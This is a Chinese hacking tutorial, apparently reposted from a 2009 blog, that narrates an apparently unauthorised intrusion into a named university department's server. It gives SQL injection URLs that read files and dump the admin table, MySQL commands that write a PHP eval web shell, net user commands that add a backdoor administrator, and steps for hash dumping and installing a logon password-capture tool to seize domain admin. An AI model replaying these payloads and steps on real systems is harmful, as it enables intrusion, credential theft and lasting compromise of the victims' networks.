作者：Msnh4ck（曉華）??版權(quán)所有：歲月聯(lián)盟 www.syue.com ? ???腳本***只是***測試中的其中一環(huán)，按技術(shù)難度劃分來說也是最初級的，當(dāng)然這類***任務(wù)交由具有一定***經(jīng)驗(yàn)的Web***即可輕松完成，對于一些難度較高的目標(biāo)，則需要***者必須擁有exploit的積累。一個安全測試團(tuán)隊(duì)，當(dāng)然也會形成非常專業(yè)的文檔，流程，以及強(qiáng)大的工具。團(tuán)隊(duì)內(nèi)部也必須有專職的***技術(shù)研究人員或者組織，建立******實(shí)驗(yàn)室，推演最新******技術(shù)，最終將知識在內(nèi)部進(jìn)行共享以及轉(zhuǎn)化。 當(dāng)然以上都是一些專業(yè)的安全***團(tuán)隊(duì)能夠做到的，對于普通的***迷來說，是很難進(jìn)入這類團(tuán)隊(duì)的，畢竟不是人人都能參與安全服務(wù)行業(yè)，多數(shù)人都是業(yè)余愛好而已，業(yè)余人員學(xué)習(xí)的最大意義在于學(xué)習(xí)最新***技術(shù)來武裝自己不被***。技術(shù)學(xué)習(xí)都是從低到高而進(jìn)行的，下面以實(shí)例的形式來講解如何進(jìn)行腳本***。本次***主要涉及如下知識： ?? 主機(jī)端口掃描 ?? Web/MYSQL*** ?? WindowS主機(jī)提權(quán) ?? 域環(huán)境的*** 下面將嚴(yán)格按照以上步驟實(shí)施本次***任務(wù)，同時向新手朋友體現(xiàn)普通******的基本步驟以及一些經(jīng)典***測試工具的應(yīng)用。本次******的目標(biāo)是國內(nèi)某著名大學(xué)，看域名應(yīng)該知道是誰。其地址如下： www.mse.tsinghua.edu.cn 主機(jī)端口掃描 ? ???很多***技術(shù)迷對于端口掃描很不在乎，原因是從主機(jī)直接下手的機(jī)會相對比較渺茫，但是這樣的想法是不夠嚴(yán)謹(jǐn)?shù)?#xff0c;筆者不是在否定它的正確性。作為一次安全***，主機(jī)端口掃描是非常重要的，同時也是必須做的，端口掃描的內(nèi)容也會詳細(xì)寫入文檔，提供給客戶。對于***人員來說不僅全面了解目標(biāo)服務(wù)器的安全狀況，更重要的是得到了一些基礎(chǔ)情報(bào)，這些情報(bào)會決定你的整個***走向。對于端口掃描工具的選用，可以應(yīng)用NmaP這類王牌掃描器。其實(shí)NMAP的功能非常強(qiáng)大的，不僅體現(xiàn)在端口掃描上，新版本中增加了一些功能強(qiáng)悍的插件，這類插件對于******是非常有幫助的，具體可以自己查看。目前NMAP的最新版本是5.0，讀者朋友可以自行下載安裝。下面應(yīng)用掃描器對目標(biāo)系統(tǒng)進(jìn)行掃描測試，可以執(zhí)行如下命令： Nmap -v -A www.mse.tsinghua.edu.cn 通過掃描器返回的數(shù)據(jù)，得到如下一些重要信息。如圖1所示 下載 (128.8 KB) 2009-10-24 03:34 以上只是一些基本的端口開放情況，通過掃描我們還可以得到目標(biāo)服務(wù)器運(yùn)行的詳細(xì)軟件版本。如圖2所示 下載 (108.07 KB) 2009-10-24 03:34 從以上掃描的結(jié)果來看，這臺服務(wù)器并不安全，因?yàn)橛羞^多的敏感端口暴露在外部，這樣是極易受到***的。現(xiàn)在需要將掃描結(jié)果進(jìn)行整理，整理范圍是敏感端口。筆者整理的結(jié)果如下： ??21/tcp? ???ftp? ?? ?? ?? ?Serv-U ftpd 6.4 ??53/tcp? ???domain? ?? ???Microsoft DNS ??80/tcp? ???http? ?? ?? ???Apache httpd 2.0.53 ??3306/tcp? ?mysql? ?? ?? ? MySQL 4.1.9-nt ??3389/tcp? ?microsoft-rdp??Microsoft Terminal Service ??8080/tcp? ?Apache Tomcat/Coyote JSP engine 1.0 ??Running:? ?Microsoft Windows 2003 以上各個端口如何進(jìn)行***，相信大家都很精通，畢竟大家都是首先學(xué)習(xí)系統(tǒng)漏洞***的。另外筆者給新手朋友推薦一款非常不錯的漏洞掃描器，那就是大名鼎鼎的Nessus，最新版本為3.X。筆者使用Nessus對以上端口的漏洞掃描，均沒有任何進(jìn)展，下邊就不得不考慮使用腳本***技術(shù)了。現(xiàn)在我們首先要弄明白如何進(jìn)行下面的腳本***，通過掃描知道目標(biāo)服務(wù)器應(yīng)用的是Apache httpd 2.0.53以及Apache Tomcat/Coyote JSP engine 1.0，數(shù)據(jù)庫是MySQL 4.1.9-nt。這樣可以推測目標(biāo)服務(wù)器所使用的程序應(yīng)該是php以及JSP二種類型，對于這類程序最好的***就是注入漏洞，另外MYSQL對***也有幫助，在后邊你將看到他的用武之地。 ?? ?Web/MYSQL*** 從系統(tǒng)漏洞***失利后，必須轉(zhuǎn)戰(zhàn)作戰(zhàn)目標(biāo)。通常WEB系統(tǒng)是最脆弱的一環(huán)，在進(jìn)行Web***之前需要簡單搜集一些信息。比如服務(wù)器做綁定的域名數(shù)量，以及應(yīng)用的何種Web程序以及數(shù)據(jù)庫系統(tǒng)，如果要進(jìn)行社工***的話，還需要收集管理員的基本信息，比如聯(lián)系的QQ，EMAIL，手機(jī)等。下面對服務(wù)器域名綁定情況作一下簡單判斷。如圖3所示 下載 (94.2 KB) 2009-10-24 03:34 該服務(wù)器運(yùn)行著多個網(wǎng)站，這樣有利于主站***失利后的旁注***。通過瀏覽器打開主站，主站應(yīng)用的是PHP程序，后臺數(shù)據(jù)庫已經(jīng)通過掃描得到了。如圖4所示 下載 (184.54 KB) 2009-10-24 03:34 現(xiàn)在我們可以對這個主站展開攻勢了，首先是測試常規(guī)腳本漏洞，如何查找注入漏洞，這里就不廢話了，大家都是專家水平了。這里給新手普及一款腳本漏洞掃描利器—【jsky】 這款工具是ZWELL寫的，效果還是非常不錯的。直接運(yùn)行【jsky】主程序，點(diǎn)擊【FILE】菜單，選擇【NEW SCAN】選項(xiàng)。出現(xiàn)如下對話框，如圖5所示 下載 (51.61 KB) 2009-10-24 03:34 在上面的【URL】中輸入要檢測的目標(biāo)站點(diǎn)地址，如圖6所示 下載 (41.57 KB) 2009-10-24 03:34 點(diǎn)擊【NeXT】進(jìn)入下一步的設(shè)置，這里可以根據(jù)自己需要進(jìn)行設(shè)置，筆者這里保持默認(rèn)即可。如圖7所示 下載 (61.41 KB) 2009-10-24 03:34 繼續(xù)選擇【NEXT】 最后點(diǎn)擊【Finish】完成設(shè)置 如圖8所示 下載 (57.24 KB) 2009-10-24 03:34 執(zhí)行【SCAN】進(jìn)行漏洞掃描，很快就發(fā)現(xiàn)了多處注入漏洞。如圖9所示 下載 (137.09 KB) 2009-10-24 03:35 筆者從中挑選了一個注入點(diǎn)進(jìn)行諸如測試，其頁面如下： http://www.mse.tsinghua.edu.cn:80/mse/news/detail.php?ID=172 首先進(jìn)行字段判斷，具體判斷過程就不說了。筆者得到當(dāng)前具有5個字段。如圖10所示 下載 (95.97 KB) 2009-10-24 03:35 執(zhí)行如下語句得到可被用來顯示數(shù)據(jù)的字段，語句如下: http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=-172??union select 1,2,3,4,5 如圖11所示 下載 (77.88 KB) 2009-10-24 03:38 通過上圖得知，已經(jīng)獲得多個可被顯示的字段。現(xiàn)在來看一下數(shù)據(jù)庫的詳細(xì)信息，主要是判斷當(dāng)前連接的賬戶。執(zhí)行如下語句： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=-172??union select 1,user(),3,4,5/* 結(jié)果出現(xiàn)下列錯誤信息，應(yīng)該是字符集設(shè)置的問題，如圖12所示 下載 (65.12 KB) 2009-10-24 03:38 Version()內(nèi)置函數(shù)也無法顯示，對于連接用戶權(quán)限的判斷十分重要，若是ROOT用戶，則可以直接讀取文件了。下面我們來嘗試讀取c:\boot.ini文件。執(zhí)行如下語句： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=-172??union select 1,load_file(char(99,58,92,98,111,111,116,46,105,110,105)),3,4,5/* 結(jié)果發(fā)現(xiàn)能夠讀取，那么可以判斷當(dāng)前連接用戶是ROOT權(quán)限了。如圖13所示 下載 (146.12 KB) 2009-10-24 03:38 現(xiàn)在來確定下接下來的***思路： ●讀取APACHE配置文件，可得網(wǎng)站絕對路徑 ●讀取APACHE_TOMCAT配置文件，得JSP站點(diǎn)絕對路徑以及管理密碼 ●將一句話***導(dǎo)出到JSP站目錄下 ●讀取JSP或者PHP站點(diǎn)數(shù)據(jù)庫連接文件，得ROOT密碼。 ●讀取SERV_U得到網(wǎng)站路徑，以及加密的賬戶。 ●注入后臺數(shù)據(jù)庫，得到管理密碼進(jìn)后臺。 通過測試發(fā)現(xiàn)這些軟件都不是默認(rèn)安裝的，無法進(jìn)行讀取，管理應(yīng)該是存放在一個特定的目錄中，這樣很難猜解。在正面戰(zhàn)場（主站）也沒有通過提交單引號來得到路徑，總之測試了爆路徑的所有方法都無功而返。這樣我們只能猜解后臺管理表和字段來爆后臺密碼了，由于數(shù)據(jù)庫版本是MYSQL 4.1.9-nt，這樣注入受到很大的限制，如果字段不是常見的，是很難進(jìn)行猜解的。下面就開始猜解后臺管理表，猜解過程大家都會，成功的幾率就看平時的猜解經(jīng)驗(yàn)以及字典豐富程度了。筆者發(fā)現(xiàn)login表是后臺的管理表，猜解語句如下： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=172 union select 1,2,3,4,5 from login/* 表有了，還需要字段。通過猜解發(fā)現(xiàn)字段是常規(guī)的username以及password,猜解語句如下： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=172??union select 1,concat(username,0x3a,password),3,4,5 from login/* 下面爆出后臺管理密碼，語句如下： http://www.mse.tsinghua.edu.cn/mse/news/detail.php?ID=-172 union select 1,concat(username,0x3a,password),3,4,5 from login/* 如圖14所示 下載 (110.08 KB) 2009-10-24 03:39 密碼有了，后臺也是常規(guī)的頁面，很容易查找。如圖15所示 下載 (53.01 KB) 2009-10-24 03:39 利用得到的密碼順利登陸，這里就要進(jìn)入奪取Webshell的環(huán)節(jié)了。后臺是非常的簡單，馬上找到圖片上傳的頁面上傳PHP***。如圖16所示 下載 (64.28 KB) 2009-10-24 03:39 提交后發(fā)現(xiàn)無法進(jìn)行上傳，通過給PHP***頭部添加gif89a頁無濟(jì)于事，經(jīng)過多種方式進(jìn)行突破都無法上傳。最后上傳了一個真實(shí)的圖片文件，結(jié)果還是沒有上傳成功，通過返回的錯誤信息我們得到了網(wǎng)站的絕對路徑。如圖17所示 下載 (64.24 KB) 2009-10-24 03:39 連正常的圖片文件都無法上傳，那么PHP腳本也肯定不能了，后臺奪取Webshell的路也走到盡頭了。現(xiàn)在有了路徑，可以嘗試讀取網(wǎng)站數(shù)據(jù)庫連接文件。為了方便，筆者直接使用工具了。成功得到ROOT密碼，如圖18所示 下載 (44.87 KB) 2009-10-24 03:39 現(xiàn)在我們登錄遠(yuǎn)程MYSQL數(shù)據(jù)庫準(zhǔn)備寫入一句話***，執(zhí)行如下命令進(jìn)行連接： mysql -h166.111.38.19 -uroot -ppassFORroot 成功登陸，如圖19所示 下載 (50.84 KB) 2009-10-24 03:39 下面開始導(dǎo)出一句話***到Web目錄下，執(zhí)行如下SQL語句。 use mysql; Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>'); select cmd from a into outfile 'E:/webpage/mse/mse/news/xh.php'; Drop TABLE IF EXISTS a; 以上語句執(zhí)行的很順利，如圖20所示 下載 (44.35 KB) 2009-10-24 03:39 一句話***是導(dǎo)出成功的，其完整地址如下： http://www.mse.tsinghua.edu.cn/mse/news/xh.php 使用一句話***客戶端進(jìn)行連接，如圖21所示 下載 (55.27 KB) 2009-10-24 03:39 通過一句話***，筆者上傳了一個大馬以方便操作，下面部分就是提權(quán)操作了。 ? WindowS主機(jī)提權(quán) 由于當(dāng)前使用的是APACHE服務(wù)器，默認(rèn)是以系統(tǒng)權(quán)限啟動的，這里我們可以執(zhí)行任意系統(tǒng)命令。首先查看當(dāng)前權(quán)限，可以使用whoami命令。如圖22所示 下載 (31.61 KB) 2009-10-24 03:39 看來管理員并沒有對APACHE進(jìn)行降權(quán)，下面直接使用NET命令添加賬戶。如圖23所示 下載 (31.44 KB) 2009-10-24 03:39 發(fā)現(xiàn)并沒有添加成功，根據(jù)平時經(jīng)驗(yàn)來看，估計(jì)是服務(wù)器做了密碼安全策略，驗(yàn)證了密碼長度。下面使用一個足夠復(fù)雜的密碼，添加命令如下： Net user msnh4ck 123456qwert!@# /add Net localgroup administrators msnh4ck /add 執(zhí)行以上命令，通過返回的結(jié)果來看是成功的。如圖24 下載 (31.45 KB) 2009-10-24 03:39 利用添加的用戶，成功登陸遠(yuǎn)程桌面。如圖25 下載 (29.85 KB) 2009-10-24 03:39 域環(huán)境的*** 登陸的時候發(fā)現(xiàn)當(dāng)前這臺主機(jī)是域服務(wù)器，關(guān)于域環(huán)境的***，《***手冊》有多篇文章可供參考了，不熟悉的朋友可以回頭復(fù)習(xí)下。筆者通過大馬上傳了一個hash提取工具gethashes.exe，提取了其他賬戶的hash值。如圖26所示 下載 (64.87 KB) 2009-10-24 03:39 筆者沒有下載120G的彩虹表，于是就用前段時間下的7G表進(jìn)行破解。破解效果很不如意，只破解出了guest賬戶的密碼。如圖27所示 下載 (40.26 KB) 2009-10-24 03:39 通過這個賬戶登錄進(jìn)去，在其目錄下還發(fā)現(xiàn)了一些***工具。看來已經(jīng)有人捷足先登了。由于當(dāng)前主機(jī)就是域服務(wù)器，筆者就給服務(wù)器安裝了一個終端密碼截獲工具【winlogohack】，這里主要有二個考慮，第一是記錄域管理員的密碼，第二是非常邪惡的，如果前邊這個***在這個內(nèi)網(wǎng)中有收獲，筆者可以坐收漁翁之利。幾天之后筆者順利截獲到了域管理員的密碼，如圖28所示 下載 (49.06 KB) 2009-10-24 03:39 有了域管理員的密碼就可以在這個域中任意擺布了。 總結(jié)：本節(jié)內(nèi)容詳細(xì)講解了一次典型的******任務(wù)，希望這篇文章能夠幫助到新手朋友。對于本文有任何的疑問以及意見，請?jiān)凇稓q月聯(lián)盟》找我交換意見，謝謝

轉(zhuǎn)載于:https://blog.51cto.com/zhuxihua/303312

與50位技術(shù)專家面對面20年技術(shù)見證，附贈技術(shù)全景圖

總結(jié)

以上是生活随笔為你收集整理的***脚本***普及的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。